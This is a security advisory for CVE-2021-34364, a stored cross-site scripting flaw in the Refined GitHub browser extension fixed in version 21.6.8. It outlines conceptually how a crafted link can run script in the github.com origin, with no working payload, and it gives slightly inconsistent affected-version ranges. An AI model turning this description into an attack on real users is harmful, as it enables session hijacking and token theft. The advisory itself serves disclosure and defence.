CVE-2021-34364

Vulnerability

The Refined GitHub browser extension, prior to version 21.6.8, contains a stored cross-site scripting (XSS) vulnerability (CWE-79). An attacker can inject arbitrary HTML or JavaScript by crafting a malicious link within a document (e.g., an issue, pull request, or comment) on GitHub. The vulnerability resides in the extension's handling of link elements in page content. Affected versions: all versions up to and including 21.6.1; fixed in 21.6.8 [1][2].

Exploitation

An attacker needs only the ability to post a crafted link on a GitHub page that is viewed by a victim running the vulnerable extension. No authentication or special network position is required beyond standard GitHub access. The attacker creates a link with specially crafted attributes (e.g., a href containing JavaScript or event handlers) that bypasses the extension's filtering. When the victim's browser renders the page with Refined GitHub active, the extension processes the link and executes the injected script within the context of the github.com origin [2].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser within the GitHub session. This could lead to session hijacking, data theft (e.g., repository content, access tokens), and unauthorized actions on behalf of the victim. GitHub's strict Content-Security-Policy (CSP) partially mitigates the risk, but the XSS could still bypass certain CSP restrictions depending on the injection point [1][2].

Mitigation

The vulnerability is fixed in Refined GitHub version 21.6.8, released on 2021-06-09 [1]. Users should update the browser extension to 21.6.8 or later. No workaround other than disabling the extension is available for earlier versions. GitHub's CSP provides an additional layer of defense but is not a complete fix [2].